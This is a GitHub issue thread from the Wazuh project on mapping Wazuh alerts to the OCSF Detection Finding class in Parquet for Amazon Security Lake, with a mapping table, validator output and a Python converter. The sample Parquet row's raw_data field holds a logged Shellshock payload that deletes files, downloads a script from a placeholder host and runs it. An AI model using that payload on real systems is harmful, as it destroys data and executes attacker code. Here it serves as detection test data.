Amazon Security Lake integration - Data transform and delivery (DTD) #145

AlexRuiz7 · 2024-01-31T11:36:08Z

Description

Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from wazuh-indexer indexes, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, we need to somehow transform the data during the pipeline, to later on upload it to the Amazon Security Lake S3 bucket already in OCSF and Parquet.

To transform the data, we'll explore the use of a Lambda function and a Python script. The main difference about these 2 approaches is the resources required, as the first one needs an auxiliary S3 bucket.

Tasks

Subtasks

Definition of done

These two proposals will be worked in parallel. As soon as we manage to get one of these workings, we can consider this issue completed. Once that happens, we'll discuss the next steps.

The text was updated successfully, but these errors were encountered:

kclinden · 2024-01-31T13:46:16Z

Has sending the data to a Kinesis Firehose with data transformation to parquet been considered?
https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html

AlexRuiz7 · 2024-02-09T16:24:21Z

Together with @wazuh/threat-intel team, we have worked on generating mappings to transform our data to the OCSF schema. In order to do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but was discarded due to its deprecation on the latest version of OCSF.

OCSF Version: 1.1.0

OCSF	Value
`category_uid`	2
`category_name`	Findings
`class_uid`	2004
`class_name`	Detection Finding
`type_uid`	200401
`metadata.product.name`	Wazuh
`metadata.product.vendor_name`	Wazuh, Inc,.
`metadata.product.version`	4.9.0
`metadata.product.lang`	en
`metadata.log_name`	Security events
`metadata.log_provider`	Wazuh

OCSF (2004)	Wazuh event field
`activity_id`	1
`time`	timestamp
`message`	rule.description
`count`	rule.firedtimes
`finding_info.uid`	id
`finding_info.title`	rule.description
`finding_info.types`	input.type
`finding_info.analytic.category`	rule.groups
`finding_info.analytic.name`	decoder.name
`finding_info.analytic.type`	Rule
`finding_info.analytic.type_id`	1
`finding_info.analytic.uid`	rule.id
`risk_score`	rule.level
`finding_info.attacks.tactic.name`	rule.mitre.tactic
`finding_info.attacks.technique.name`	rule.mitre.technique
`finding_info.attacks.technique.uid`	rule.mitre.technique
`finding_info.attacks.version`	v13.1
`unmapped`	rule.nist_800_53
`severity_id`	convert(rule.level)
`status_id`	99
`resources.name`	agent.name
`resources.uid`	agent.id
`unmapped`	['_index', 'location', 'manager.name']
`raw_data`	full_log

Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673

To test these mappings work and lead our data to be OCSF compliant, we have used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools.

parquet-tools show parquet/wazuh-event.ocsf.parquet

+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+

python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0

Attempting to Validate File: wazuh-event.ocsf.parquet...

Validating Against Event Class: detection_finding (2004)...

VALID OCSF.

Python mappings to OCSF

#!/usr/bin/python

# event comes from Filebeat
event = {}


def normalize(level: int) -> int:
    """
    Normalizes rule level into the 0-6 range, required by OCSF.
    """
    # TODO normalization
    return level


def join(iterable, separator=","):
    return (separator.join(iterable))


def convert(event: dict) -> dict:
    """
    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
    """
    ocsf_class_template = \
        {
            "activity_id": 1,
            "category_name": "Findings",
            "category_uid": 2,
            "class_name": "Detection Finding",
            "class_uid": 2004,
            "count": event["_source"]["rule"]["firedtimes"],
            "message": event["_source"]["rule"]["description"],
            "finding_info": {
                "analytic": {
                    "category": join(event["_source"]["rule"]["groups"]),
                    "name": event["_source"]["decoder"]["name"],
                    "type_id": 1,
                    "uid": event["_source"]["rule"]["id"],
                },
                "attacks": {
                    "tactic": {
                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
                    },
                    "technique": {
                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
                    },
                    "version": "v13.1"
                },
                "title": event["_source"]["rule"]["description"],
                "types": [
                    event["_source"]["input"]["type"]
                ],
                "uid": event["_source"]['id']
            },
            "metadata": {
                "log_name": "Security events",
                "log_provider": "Wazuh",
                "product": {
                    "name": "Wazuh",
                    "lang": "en",
                    "vendor_name": "Wazuh, Inc,."
                },
                "version": "1.1.0",
            },
            "raw_data": event["_source"]["full_log"],
            "resources": [
                {
                    "name": event["_source"]["agent"]["name"],
                    "uid": event["_source"]["agent"]["id"]
                },
            ],
            "risk_score": event["_source"]["rule"]["level"],
            "severity_id": normalize(event["_source"]["rule"]["level"]),
            "status_id": 99,
            "time": event["_source"]["timestamp"],
            "type_uid": 200401,
            "unmapped": {
                "data_sources": [
                    event["_index"],
                    event["_source"]["location"],
                    event["_source"]["manager"]["name"]
                ],
                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
            }
        }

    return ocsf_class_template

AlexRuiz7 · 2024-02-13T17:43:22Z

I'm working on an event generator tool to test the integration and ease its development.

AlexRuiz7 added level/task Task issue type/enhancement Enhancement issue labels Jan 31, 2024

This was referenced Jan 31, 2024

Amazon Security lake integration as source #128

Closed

Amazon Security Lake integration - Logstash #135

Closed

This was referenced Feb 13, 2024

Add events generator tool for wazuh-alerts #152

Merged

Amazon Security Lake integration - DTD - Python script #144

Closed

Amazon Security Lake integration - DTD - OCSF compliant events #156

Closed

AlexRuiz7 closed this as completed Apr 24, 2024

This was referenced Apr 25, 2024

Bad Parquet format on Amazon Security Lake integration #214

Closed

Amazon Security Lake integration - Use Security Finding class #215

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Amazon Security Lake integration - Data transform and delivery (DTD) #145

Amazon Security Lake integration - Data transform and delivery (DTD) #145

AlexRuiz7 commented Jan 31, 2024 •

edited

Loading

kclinden commented Jan 31, 2024

AlexRuiz7 commented Feb 9, 2024

AlexRuiz7 commented Feb 13, 2024

Amazon Security Lake integration - Data transform and delivery (DTD) #145

Amazon Security Lake integration - Data transform and delivery (DTD) #145

Comments

AlexRuiz7 commented Jan 31, 2024 • edited Loading

Description

Tasks

Subtasks

Definition of done

kclinden commented Jan 31, 2024

AlexRuiz7 commented Feb 9, 2024

OCSF Version: 1.1.0

AlexRuiz7 commented Feb 13, 2024

AlexRuiz7 commented Jan 31, 2024 •

edited

Loading